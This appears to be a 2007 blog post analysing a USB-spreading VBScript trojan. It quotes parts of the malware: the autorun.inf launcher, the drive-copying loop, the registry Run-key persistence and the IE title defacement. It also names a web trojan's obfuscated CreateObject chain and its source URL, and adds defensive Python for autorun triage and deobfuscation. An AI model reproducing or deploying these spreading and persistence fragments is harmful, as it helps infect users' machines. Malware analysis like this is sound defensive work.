Apr 26, 2007

Experience with a VBScript Trojan

A few days ago I suddenly found a VBS file that had appeared on my pen drive.
Out of curiosity I opened it up, and was shocked by what I saw!

Set fs = createobject("Scripting.FileSystemObject")
Set WNet = WScript.CreateObject("WScript.Network")
Set mf = fs.getfile(Wscript.ScriptFullname)
oldname=CStr(fs.getfilename(Wscript.ScriptFullname))
newname = WNet.ComputerName & ".vbs"
'EHR02.vbs EHR02.vbs EHR02.vbs EHR02.vbs EHR02.vbsEHR02.vbsEHR02.vbsEHR02.vbsEHR02.vbs
rgname = Replace(newname,".vbs","")
atr = "[autorun]"&vbcrlf&"shellexecute=wscript.exe EHR02.vbs"


The autorun line above is what makes Windows launch the script automatically when the drive is plugged in,
and the loop below is what copies the script onto my pen drive!
Besides that, the file is also copied to other system paths such as windows, windows\system, windows\system32 and so on.

For each flashdrive in fs.drives
If (flashdrive.drivetype = 1) and flashdrive.path <> "A:" Then
Set tf=fs.getfile(flashdrive.path &"\EHR02.vbs")
tf.attributes =32
Set tf=fs.createtextfile(flashdrive.path &"\EHR02.vbs",2,true)
tf.write mysource
tf.close
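Since the whole infection chain hinges on that two-line autorun.inf, a defender's first check on any removable drive is whether its autorun.inf points at a script host at all. Here is an added example (my own, not code from the trojan or from any tool mentioned above) that parses an autorun.inf, flags launch entries that run wscript.exe/cscript.exe or reference a .vbs/.js/.bat file, and scans a list of drive roots; the sample content is the exact string the dropper writes, and the temporary directory standing in for a pen drive is constructed for the demo.

```python
import os
import re
import tempfile

# Script hosts and script extensions that a legitimate removable-media autorun.inf
# (which normally launches an installer .exe) has no reason to use.
SCRIPT_HOSTS = {"wscript.exe", "cscript.exe", "mshta.exe", "cmd.exe", "powershell.exe"}
SCRIPT_EXTS = {".vbs", ".vbe", ".js", ".jse", ".wsf", ".wsh", ".bat", ".cmd", ".hta"}

# Constructed sample: the same two-line autorun.inf the dropper above writes to each drive.
SAMPLE_AUTORUN = "[autorun]\r\nshellexecute=wscript.exe EHR02.vbs\r\n"


def parse_autorun(text):
    """Return the key=value entries of the [autorun] section, keys lower-cased."""
    entries = {}
    in_autorun = False
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith(";"):      # blank or INI comment
            continue
        if line.startswith("[") and line.endswith("]"):
            in_autorun = line[1:-1].strip().lower() == "autorun"
            continue
        if in_autorun and "=" in line:
            key, _, value = line.partition("=")
            entries[key.strip().lower()] = value.strip()
    return entries


def _basename(token):
    """Last path component, lower-cased; handles both \\ and / separators."""
    return re.split(r"[\\/]", token)[-1].lower()


def is_launch_key(key):
    """open=, shellexecute= and shell\\<verb>\\command= all cause code to run."""
    return key in ("open", "shellexecute") or (
        key.startswith("shell\\") and key.endswith("\\command")
    )


def triage_autorun(text):
    """Return a finding for every launch entry that runs a script host or a script file."""
    findings = []
    for key, value in parse_autorun(text).items():
        if not is_launch_key(key):
            continue
        tokens = value.replace('"', "").split()
        reasons = []
        if tokens and _basename(tokens[0]) in SCRIPT_HOSTS:
            reasons.append("script host " + _basename(tokens[0]))
        scripts = [t for t in tokens if os.path.splitext(_basename(t))[1] in SCRIPT_EXTS]
        if scripts:
            reasons.append("script file " + ", ".join(scripts))
        if reasons:
            findings.append({"key": key, "command": value, "reasons": reasons})
    return findings


def scan_roots(roots):
    """Look for an autorun.inf in each drive root (or directory) and triage it."""
    report = {}
    for root in roots:
        path = os.path.join(root, "autorun.inf")
        if os.path.isfile(path):
            with open(path, "r", errors="replace") as fh:
                report[root] = triage_autorun(fh.read())
    return report


if __name__ == "__main__":
    # Constructed stand-in for a pen drive root carrying the dropper's autorun.inf.
    with tempfile.TemporaryDirectory() as fake_drive:
        with open(os.path.join(fake_drive, "autorun.inf"), "w") as fh:
            fh.write(SAMPLE_AUTORUN)
        for root, findings in scan_roots([fake_drive]).items():
            for f in findings:
                print(f"{root}: {f['key']}={f['command']} -> {'; '.join(f['reasons'])}")
```

On a real machine you would pass the actual drive roots (for example every removable drive letter) to scan_roots; a clean installer-style autorun.inf such as open=setup.exe produces no finding, while the dropper's line is flagged twice over, once for wscript.exe and once for the .vbs.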


And finally, these lines register the script under the Windows startup (Run) key in the registry and pop up a message box saying "Mutation of Trojan virus!" when the date is the 9th (the code also requires a random 1-in-100 check to pass)!!

Set rg = createobject("WScript.Shell")
rg.regwrite "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\" & rgname & "",winpath&"\SYSTEM32\" & newname
if check <> 1 then
If Int((100-1+1)* Rnd+1)=9 And Int(Day(date))=9 Then
MsgBox "Mutation of Trojan virus!"
End if
Wscript.sleep 60000
Else

And there is yet another payload: if the day is not the 9th, your IE browser title is changed to
"Hacked by xxxxx"

rg.regwrite "HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\Window Title","Hacked by " & Replace(oldname,".vbs","")

Well, I am shocked, but excited about it!
I started looking into VBScript on my machine and found that VBScript is actually used in a lot of fields, including IIS setup, project deployment, Photoshop batch actions and so on.

It seems nice to 'play' with, since I am a VB programmer =)

A few days later, I saw a website that had been hacked by this method again;
that site's pages had been changed to IFRAME lines across the screen.

Tracing further into it, the code came from "http://www.goldunix.com/test.htm".
This Trojan builds the names of Windows objects by appending single characters into a variable, then creates the object via the CreateObject() function:

b9="M"
b10="L"
b11="H"
b12="T"
b13="T"
b14="P"
strb=b4&b5&b6&b7&b8&b9&b10&b11&b12&b13&b14
Set x = df.CreateObject(strb,"")
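The character-by-character assembly above is there to keep the ProgID out of plain sight, so a string search for "XMLHTTP" or "Shell.Application" in the HTML finds nothing. It is easy to undo statically: collect every simple assignment, then substitute variables back into the CreateObject() argument. Here is an added example (my own, not the trojan's code or any existing tool) that does exactly that; the sample script inside it is constructed in the style of the fragment above and also shows the partial case, where some of the variables (b4 to b8, never shown on this page) are missing and are left as placeholders rather than guessed.

```python
import re

# A line of the form  name = expression  (with or without a leading Set).
ASSIGN_RE = re.compile(r'^\s*(?:Set\s+)?([A-Za-z_]\w*)\s*=\s*(.+?)\s*$', re.IGNORECASE)
# The first argument of any CreateObject(...) call, up to the first comma or close paren.
CREATE_RE = re.compile(r'CreateObject\s*\(\s*([^,)]+)', re.IGNORECASE)
# Pieces of a concatenation: a quoted literal, an identifier (dots allowed) or a number.
# The & operator and whitespace between pieces are simply skipped.
TOKEN_RE = re.compile(r'"(?:[^"]|"")*"|[A-Za-z_][\w.]*|\d+')

# Constructed sample in the style of the obfuscated dropper: the first call spells a
# ProgID from split literals, the second reuses the page's b9..b14 fragment with b4..b8
# deliberately absent, the third passes a plain literal.
SAMPLE = '''
a1="Sh"
a2="el"
a3="l."
a4="App"
a5="lication"
strb=a1&a2&a3&a4&a5
Set x = df.CreateObject(strb,"")
b9="M"
b10="L"
b11="H"
b12="T"
b13="T"
b14="P"
strc=b4&b5&b6&b7&b8&b9&b10&b11&b12&b13&b14
Set y = CreateObject(strc)
Set fs = createobject("Scripting.FileSystemObject")
'''


def parse_assignments(script):
    """Collect every simple assignment into a name -> raw expression table."""
    table = {}
    for line in script.splitlines():
        if line.lstrip().startswith("'"):      # VBScript comment line
            continue
        m = ASSIGN_RE.match(line)
        if m:
            table[m.group(1).lower()] = m.group(2)   # VBScript names are case-insensitive
    return table


def resolve(expr, table, depth=0):
    """Concatenate the literal value of expr, substituting known variables recursively.

    Anything that cannot be resolved (an unknown name, a function call, a number) is kept
    as <token> so the analyst can see exactly which pieces are still missing.
    """
    out = []
    for tok in TOKEN_RE.findall(expr):
        if tok.startswith('"'):
            out.append(tok[1:-1].replace('""', '"'))         # VBScript doubles quotes to escape
        elif tok.lower() in table and depth < 50:            # depth guard against a = a & "x"
            out.append(resolve(table[tok.lower()], table, depth + 1))
        else:
            out.append("<" + tok + ">")
    return "".join(out)


def recover_progids(script):
    """Return the resolved first argument of every CreateObject call, in source order."""
    table = parse_assignments(script)
    return [resolve(m.group(1), table) for m in CREATE_RE.finditer(script)]


if __name__ == "__main__":
    for progid in recover_progids(SAMPLE):
        print(progid)
```

Run against the sample, the first call resolves to Shell.Application and the third to Scripting.FileSystemObject, while the second comes back as <b4><b5><b6><b7><b8>MLHTTP, which tells you precisely which five assignments to go and find in the rest of the file before deciding what the object is.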


It uses the "Microsoft.Adodb.Stream" object's Get method to load the IFRAME from the hacker's site.
Then the trojan uses createobject("Scripting.FileSystemObject","") to drop and execute an svchost.exe, and further content is received from the net via this svchost.

Then, using Createobject("Shell.Application","") and its ShellExecute function, it spawns more svchost processes to retrieve and insert rubbish IFrame code that blocks the original website.

This whole process starts from an HTML file with VBScript inside it; unluckily, users who allow ActiveX controls in their IE let the trojan activate.

I tested that HTML file and there was no issue for my Firefox =) ha ha ha...
but IE users have to be careful about allowing unknown ActiveX, ya!

Trojans are dangerous, but fun to a programmer, ha ha ha...... (just kidding, for the non-IT guys)
